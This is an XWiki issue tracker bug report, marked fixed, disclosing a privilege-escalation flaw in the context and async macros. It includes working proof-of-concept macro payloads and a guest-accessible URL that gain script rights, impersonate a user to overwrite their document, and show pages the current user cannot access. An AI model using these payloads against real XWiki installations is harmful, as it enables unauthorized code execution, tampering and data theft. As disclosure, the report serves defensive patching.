Details
-
Bug
-
Resolution: Fixed
-
Blocker
-
3.0 M1
-
Unit
-
High
-
Unknown
-
N/A
-
Description
The context macro in combination with the async macro allows executing macros as any user without programming rights who authored at least one document the current user can access. The current user might be a guest user. This allows different kinds of attacks:
Escalation to script rights - steps to reproduce:
- Create a document (can also be your user profile) with content
{{context document="xwiki:XWiki.username" transformationContext="document"}}{{velocity}}Hello from Velocity!{{/velocity}}{{/context}}
Replace xwiki:XWiki.username by the document reference of the document that has script rights.
Alternative with anonymous view rights: Open
<Server>/xwiki/bin/view/Main?sheet=CKEditor.HTMLConverter&language=en&sourceSyntax=xwiki%2F2.1&stripHTMLEnvelope=true&fromHTML=false&toHTML=true&text=%7B%7Bcontext%20document%3D%22xwiki%3AXWiki.username%22%20transformationContext%3D%22document%22%7D%7D%7B%7Bvelocity%7D%7DHello%20from%20Velocity!%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fcontext%7D%7D
where <Server> is the URL of your XWiki installation. You might need to replace %7B%7Bcontext%20document%3D%22xwiki%3AXWiki.username%22%20transformationContext%3D%22document%22%7D%7D%7B%7Bvelocity%7D%7DHello%20from%20Velocity!%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fcontext%7D%7D by the result of applying encodeURIComponent to the page content you want to use (replacing in particular the document reference by the one of the document with script but not programming rights).
Expected result:
An error is displayed that the user doesn't have script rights.
Actual result:
The message "Hello from Velocity!" without any surrounding text, showing that the Velocity macro has been executed. This is because the context macro only checks if the user gained programming rights, but not if the user gained script rights.
Impersonation (with script rights) - steps to reproduce:
Save a document with the following content (or execute it using the HTMLConverter as explained before):
{{context document="xwiki:XWiki.username" transformationContext="document"}} {{async async="true" cached="false" context="doc.reference"}} {{velocity}} #set($myDoc = $xwiki.getDocument('xwiki:XWiki.username')) #set($discard = $myDoc.setContent("Hello from attacker!")) #set($discard = $myDoc.save()) {{/velocity}} {{/async}} {{/context}}
Expected result:
The document xwiki:XWiki.username is unchanged.
Actual result:
The content of xwiki:XWiki.username has been replaced by "Hello from attacker!" with content author XWiki.username even though this is executed by an anonymous attacker. I expect that this would also allow using the full admin privileges of the impersonated user.
Information disclosure - steps to reproduce:
- Create a document "Hello" that is accessible by the impersonated user but not the current user.
- Execute the following content (in the user profile or via the HTMLConverter):
{{context document="xwiki:XWiki.username" transformationContext="document"}} {{async async="true" cached="false" context="doc.reference"}} {{include page="Hello" /}} {{/async}} {{/context}}
Expected result:
The document "Hello" isn't displayed.
Actual result:
The document "Hello" is displayed.
Note that this doesn't even require that the impersonated user has script rights.
Attachments
Issue Links
- is caused by
-
XWIKI-5815 Add a Context macro
- Closed